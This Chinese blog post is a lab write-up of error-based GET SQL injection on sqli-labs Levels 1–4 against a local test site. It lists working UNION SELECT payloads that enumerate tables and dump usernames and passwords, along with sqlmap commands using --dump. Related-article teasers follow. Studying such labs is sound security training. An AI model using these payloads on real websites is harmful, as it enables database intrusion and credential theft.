基于GET报错的sql注入,sqli-lab 1~4

最新推荐文章于 2023-09-11 23:34:16 发布
最新推荐文章于 2023-09-11 23:34:16 发布
阅读量178 收藏
点赞数
分类专栏: web安全 sql 文章标签: 安全 经验分享
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45694388/article/details/107858524
版权

根据注入类型可将sql注入分为两类:数字型字符型
例如:
数字型: sleect * from table where if =用户输入id
字符型:select * from table where id ='用户输入id' (有引号)

通过URL中修改对应的D值,为正常数字,大数字,字符(单引号,双引号,双单引号,括号),反斜杠\来探测URL中是否存在注入点。

另外-- (这里有一个空格,–空格)在SQL内表示注释,但在URL中,如果在最后加上-- ,浏览器在发送请求的时候会把URL末尾的空格舍去,所以我们用–+代替-- ,原因是+在URL被URL编码后会变成空格。

sqli-lab less 1~4基于报错的sql注入:

  • less1 GET - Error based - Single quotes - String
    1.输入id值尝试报错点: ?id=数字
    发现在id值为1~14可以正常返回
    在这里插入图片描述
    2.在id值(任意可以正常返回的id值)后添加单引号,发现报错,可能存在sql字符注入,
    在这里插入图片描述

可以得到,报错的sql语句为'14'' LIMIT 0,1,输入的引号闭合了id的前引号
猜测原sql语句为: select login_name,password from admin where id = 'id' limit 0,1+

3.利用order by 判断有几列数据
http://127.0.0.1/sqli-labs-master/Less-1/?id=1’ order by 3 --+
修改order by 后的值可发现1~3回显正常,order by 4 回显不正常,表示表有三列

4.使用union select statement : http://127.0.0.1/sqli-labs-master/Less-1/?id=15’ UNION SELECT 1,2,3 --+
查看显示位,输出2和3说明有两个显示位
在这里插入图片描述

5.利用union select 联合查询,获取表名
0’union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() --+
在这里插入图片描述

6.利用union select 联合查询,查看users表下的列名:
http://127.0.0.1/sqli-labs-master/Less-1/?id=0’union select 1,group_concat(column_name),3 from information_schema.columns where table_name=‘users’ --+
在这里插入图片描述

7.利用union select 联合查询,查看username,password表下的字段值
http://127.0.0.1/sqli-labs-master/Less-1/?id=0’ union select 1,group_concat(username,0x3a,password),3 from users–+
(0x3a表示分号)
在这里插入图片描述
得到所有的username和password

以上为手工注入过程,用sqlmap工具会更加方便快捷:

python sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-1/?id=1" --dbs

在这里插入图片描述

python sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-1/?id=1" -D security --tables

在这里插入图片描述

python sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-1/?id=1" -D security -T users -C username,password --dump

在这里插入图片描述
得到username和password

  1. less2.GET-Error based-intiger based
    和less1基本相同

  2. less3 : Get-errsr based-single quotes with twist-string
    id=1’ --+回显不正常
    id=1’) --+回显正常
    说明是字符型注入
    语句与less1 相同

-less4 : Get- error bassed - Double Quotes - string
id=1" 用双引号回显不正常
id=1’ 和 id=1’) 都回显正常
可推测语句为 (id=“1”)
是("")双引号闭合型
在这里插入图片描述
http://127.0.0.1/sqli-labs-master/Less-4/?id=1") --+ 回显正常
在这里插入图片描述
之后使用union select 联合查询
显示列名,表明字段

参考:
https://blog.csdn.net/sdb5858874/article/details/80727555
https://www.bilibili.com/video/BV1Q54y1D7VV?p=4

b1gpig安全
关注
专栏目录
SQLi-Labs 基于报错SQL注入
shangMD01的博客
02-17 2503
实验环境 操作系统:Windows10 安装应用软件:Sqlmap、Burpsuite、FireFox浏览器插件Hackbar等 靶机:A-SQLi-Labs 安装的应用软件:Apache、MYSQL、PHP;DVWA、SQLi-Labs 实验步骤: 1.访问目标网站 在Windows10上打开火狐浏览器,并访问靶机上的SQLi-labs网站Less-1 http://靶机ip/sql/Less-1 登录后,先给一个GET参数: http://靶机ip/sql/Less-1/?i
SQL注入-基于报错注入
xdjxi的博客
02-18 580
实验目的 熟悉报错功能函数extractvalue()的用法,掌握基于报错SQL注入基本流程 实验步骤 本实验的目标是:以SQLi-Labs网站的Less-1为入口,借助extractvalue()函数,利用基于报错注入方式获取SQLi-Labs网站用户名和密码 1 访问SQLi-Labs网站 http://(靶机ip)/sql/Less-1/?id=1 2 寻找注入点 使用3条payload寻找注入点及判断注入点的类型 http://靶机ip/sql/Less-1/?id=1'运..
GET基于报错SQL注入
qq_43776408的博客
06-04 467
SQL注入分类 GET基于报错SQL注入发现 你先下载sqli,还有phpstudy集成环境 上述你之前都玩过 浏览器输入ip/sqli 你会看到类似于树的分支一样的东西 当中第一个Less1就是今天我们要学的 还有后面几个带有Error 重点看那行黄字 然后浏览器输入ip/sqli/Less-1/?id=1 回车 界面就变了 数字可以自行改变 接下来后面加一个单引号 再次回车 ’‘14‘’LIMIT 0,1’ at line 1’ 先去掉左右单引号 ‘14‘’LIMIT 0,1’ at line
安全】P 2-4 GET基于报错SQL注入(sqli-lab靶场Less1~4)
Z_David_Z的博客
01-30 255
目录0X01 SQL注入的分类0X02 GET基于报错SQL注入发现0X03 GET基于报错SQL注入利用0X04 利用Sqlmap测试 0X01 SQL注入的分类 根据根据注入位置数据类型可将SQL注入分为两类:数字型和字符型注入位置数据类型可将SQL注入分为两类:数字型和字符型 例如: 数字型:select * from table where id = 用户输入id 例如: 字符型:select * from table where id = ‘用户输入id’ 0X02 GET基于报错SQL注入
sqli-labs靶场实现(一)【GET基于报错SQL注入】(less-1~4、具体步骤+图文详解)
weixin_46709219的博客
12-12 946
一)GET基于报错SQL注入 1)SQL注入的分类 2)get基于报错SQL注入发现 3)get基于报错SQL注入利用 4)利用sqlmap测试 二) 三) —————————————————————————————————————————————————— 一)GET基于报错SQL注入 1)SQL注入的分类 2)get基于报错SQL注入发现 3)get基于报错SQL注入利用 4)利用sqlmap测试 ...
Kali SQL注入--基于SQLi-Labs
black101的博客
07-20 1903
Kali SQL注入--基于SQLi-LabsSQLi-LabsSQL注入SQL注入的基本原理SQL注入初步实验一个结束语 SQLi-Labs SQLi-Labs是一个练习和理解SQL注入的非常合适的靶站平台,总共有75关,这里我选择它做我的实验环境来对结果进行展示。 SQL注入 SQL注入的基本原理 首先,这不是一篇极为完整的SQL注入整理,这只是一篇对原理的简单复习和介绍。 SQL注入的基本原理 这是正常的SQL语句 select * from user where id = '$id' limit
SQL注入 sqli-labs部分解析
ziwenya的博客
08-31 639
sql注入基础操作及相关sqli-labs关卡通关流程
sqli-lab(5~6详解)
gongjingege的博客
10-17 709
** Less-5 GET - Double Injection - Single Quotes - String (双注入GET单引号字符型注入) ** 知识点:1,时间延迟型手工注入;布尔型手工注入;使用concat聚合函数 2,payload原理及防御措施 3,sqlmap真香,脚本也好使 ** 0x0a 时间延迟型手工注入 ** ps: 什么是时间盲注,时间盲注就是页面不会有回显,没有回显怎么办?这时候我们可以通过sleep(),让他沉睡 为什么通过sleep() 可以判断是否存在时间盲注,因为只要
SQL注入——基于报错注入(1)
qq_52072846的博客
02-18 2878
实验目的 熟悉报错功能函数extractvalue的用法,掌握基于报错SQL注入基本流程 实验原理 (1)关于报错注入 基干报错注入,是指通讨构造特定的SOI语句,让攻击者想要查询的信息(如 数据库名、版本号、用户名等)通过页面的错误提示回显出来。 报错注入一般需要具备两个前提条件:(1)Web应用程序未关闭数据库报错函 数,对于一些SQL语句的错误直接回显在页面上:(2)后台未对一些具有报错 功能的函数进行过滤。 常用的报错功能函数包括extractvalue()、updatexml(、fl
SQL注入之基于报错注入
weixin_68951704的博客
07-05 1038
目录1.GET单引号字符型2.GET数字型3.GET单引号加括号字符型4.GET双引号字符型5.注入利用5.1利用order by判断字段5.2利用联合查询查找信息首先我们打开搭建好的sqli-labs靶场,选择less-1 进入后我们看到这样一行提示 请输入一个id值作为对应参数,这里我输入1作为参数,验证后1-14均可以回显 输入后login name 和password都显现出来我们输入单引号这里显示错误,我们将错误回显记录下来 由此我们可以猜解出SQL语句为select login_name,
sqli-labs-基于报错注入
zlloveyouforever的博客
04-30 2806
这里使用sqli-labs第六关来学习报错注入,当然第五关也是可以使用的。会简单介绍updatexml(),extractvalue(),floor(),exp(),geometrycollection(),multipoint()六个函数的使用。
利用Sqlmap进行SQL注入攻击
m0_62689523的博客
08-14 1825
sqlmap简介 sqlmap是一款基于python编写的渗透测试工具,在sql检测和利用方面功能强大,支持多种数据库。 功能:sqlmap是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL的SQL注入漏洞。.........
SQL注入(使用sqli-labs案例以及sqlmap自动化注入工具)
04-29 4928
SQL注入sqli-labs: 一个实验平台,里面有完整的SQL注入课程,需要phpstudy环境,因此先安装phpstudy环境 phpstudy: https://www.xp.cn/ 安装后发现数据库和我本机的数据库出现冲突了,只能使用 sc delete mysql 删掉我本机的mysql8服务,如果需要使用原来的mysql,管理员命令下输入 mysqld --install 删除之后成功启动 启动成功后,去下载sqli-labs: https://github.com/Audi-1/
SQL注入之GET型
最新发布
qq_51393133的博客
09-11 1074
每个数据库都有一个"table_schema"字段,存放的是该数据库的名字。一个数据库有很多表,每个表都有"table_name"字段,存放的是各个表的名字。
SQL报错注入小结
lixiangminghate的专栏
05-13 1万+
sqli-labs的前4个实验(Lab1-Lab4)是基于SQL报错注入(Error-based injection)。什么是SQL报错注入?这是一种页面响应形式。响应过程如下:当用户在前台页面上输入检索内容时,后台将前台页面上输入的检索内容无加区别的拼接成sql语句,送给数据库执行。数据库将执行结果返回给后台。后台将数据库执行结果无加区别的显示到前台页面上。上面这句话中,我用了2个"无加区别"-...
sqli-labs闯关指南 1—10
热门推荐
18年3月萌新白帽子
06-18 5万+
如果你是使用的phpstudy,请务必将sql的版本调到5.5以上,因为这样你的数据库内才会有information_schema数据库,方便进行实验测试。另外-- (这里有一个空格,--空格)在SQL内表示注释,但在URL中,如果在最后加上-- ,浏览器在发送请求的时候会把URL末尾的空格舍去,所以我们用--+代替-- ,原因是+在URL被URL编码后会变成空格。第一关1.经过语句and 1=2...
GET基于报错SQL注入漏洞详解
LoveStarbucks的博客
12-26 1101
GET基于报错SQL注入漏洞详解 开始前的补充知识: mysql中比较常用的一些函数: version():查询数据库的版本 user():查询数据库的使用者 database():数据库 system_user():系统用户名 session_user():连接数据库的用户名 current_user:当前用户名 load_file():读取本地文件 @@datadir:读取数据库路径 @@b...
sql注入报错注入原理解析
一个安全研究员
05-25 1万+
sql注入报错注入原理详解 前言 我相信很多小伙伴在玩sql注入报错注入时都会有一个疑问,为什么这么写就会报错?曾经我去查询的时候,也没有找到满意的答案,时隔几个月终于找到搞清楚原理,特此记录,也希望后来的小伙伴能够少走弯路 0x01 我们先来看一看现象,我这里有一个users表,里面有五条数据: 然后用我们的报错语句查询一下: select count(*...
sql注入sqli-lab
07-28
Sqli-lab是一个用于学习和实践SQL注入的实验环境。 在Sqli-lab中,你可以使用各种技术和工具来进行SQL注入攻击,并学习如何修复和防止这类漏洞。这个实验环境提供了一系列具有不同难度级别的注入场景,你可以尝试...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

b1gpig安全

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值